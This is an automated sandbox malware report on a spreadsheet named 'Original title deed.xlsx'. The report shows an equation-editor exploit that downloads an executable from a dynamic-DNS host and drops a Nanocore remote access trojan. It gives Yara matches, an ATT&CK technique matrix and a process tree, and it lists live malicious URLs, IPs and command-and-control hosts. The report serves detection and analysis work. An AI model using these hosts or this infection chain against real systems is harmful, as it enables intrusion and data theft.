        Source: Yara matchFile source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
        Source: Yara matchFile source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: vbc.exe, 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: vbc.exe, 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: vbc.exe, 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
        Source: Yara matchFile source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution13Path InterceptionAccess Token Manipulation1Masquerading111OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection111Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothRemote Access Software1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol122Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 402852 Sample: Original title deed.xlsx Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 94 Found malware configuration 2->94 96 Malicious sample detected (through community Yara rule) 2->96 98 Antivirus detection for URL or domain 2->98 100 10 other signatures 2->100 14 EQNEDT32.EXE 12 2->14         started        19 EXCEL.EXE 38 24 2->19         started        process3 dnsIp4 86 myhostisstillgood11.zapto.org 172.245.45.28, 49165, 80 AS-COLOCROSSINGUS United States 14->86 80 C:\Users\user\AppData\Local\...\nd[1].exe, PE32 14->80 dropped 82 C:\Users\Public\vbc.exe, PE32 14->82 dropped 88 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->88 21 vbc.exe 19 14->21         started        file5 signatures6 process7 file8 68 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 21->68 dropped 102 Maps a DLL or memory area into another process 21->102 104 Writes many files with high entropy 21->104 25 vbc.exe 17 21->25         started        29 MSBuild.exe 21->29         started        signatures9 process10 file11 74 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 25->74 dropped 106 Maps a DLL or memory area into another process 25->106 31 vbc.exe 17 25->31         started        35 MSBuild.exe 25->35         started        signatures12 process13 file14 84 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 31->84 dropped 90 Maps a DLL or memory area into another process 31->90 37 vbc.exe 17 31->37         started        40 MSBuild.exe 31->40         started        signatures15 process16 file17 70 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 37->70 dropped 42 vbc.exe 17 37->42         started        46 MSBuild.exe 37->46         started        process18 file19 76 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 42->76 dropped 108 Maps a DLL or memory area into another process 42->108 48 vbc.exe 17 42->48         started        52 MSBuild.exe 42->52         started        signatures20 process21 file22 66 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 48->66 dropped 92 Maps a DLL or memory area into another process 48->92 54 vbc.exe 17 48->54         started        57 MSBuild.exe 48->57         started        signatures23 process24 file25 72 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 54->72 dropped 59 vbc.exe 17 54->59         started        62 MSBuild.exe 54->62         started        process26 file27 78 C:\Users\user\AppData\...\lk95ejdjuy.dll, PE32 59->78 dropped 64 MSBuild.exe 59->64         started        process28

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe100%Joe Sandbox ML

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        24.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        8.2.vbc.exe.2860000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        30.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        14.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        23.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        13.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.2.vbc.exe.2830000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        5.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        16.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        15.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        14.2.vbc.exe.2860000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        20.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        30.2.vbc.exe.2830000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        20.2.vbc.exe.27f0000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        28.2.vbc.exe.2940000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        14.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        24.2.vbc.exe.27f0000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        21.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        30.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        34.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1130366Download File
        28.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        10.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        27.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        10.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        29.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        32.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        26.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        8.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        32.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        24.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        34.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        22.2.vbc.exe.2850000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        22.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        22.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        25.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        28.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        16.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        26.2.vbc.exe.27e0000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        7.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        20.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        26.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        4.2.vbc.exe.30a0000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        31.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        12.2.vbc.exe.1f10000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        9.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        18.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        18.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        8.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        79.134.225.260%Avira URL Cloudsafe
        nassiru1166main.ddns.net0%Avira URL Cloudsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe100%Avira URL Cloudphishing
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        myhostisstillgood11.zapto.org
        172.245.45.28
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          79.134.225.26true
          • Avira URL Cloud: safe
          unknown
          nassiru1166main.ddns.nettrue
          • Avira URL Cloud: safe
          unknown
          http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exetrue
          • Avira URL Cloud: phishing
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpfalse
            high
            http://www.windows.com/pctv.vbc.exe, 0000000A.00000002.2202157989.0000000002B60000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.comvbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtvbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpfalse
                  high
                  http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmpfalse
                    high
                    http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmpfalse
                      high
                      http://investor.msn.com/vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpfalse
                        high
                        http://www.%s.comPAvbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmpfalse
                          high
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oevbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpfalse
                            high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            172.245.45.28
                            myhostisstillgood11.zapto.orgUnited States
                            36352AS-COLOCROSSINGUStrue

                            General Information

                            Joe Sandbox Version:32.0.0 Black Diamond
                            Analysis ID:402852
                            Start date:03.05.2021
                            Start time:14:54:21
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:Original title deed.xlsx
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:35
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.rans.troj.expl.evad.winXLSX@65/72@1/1
                            EGA Information:Failed
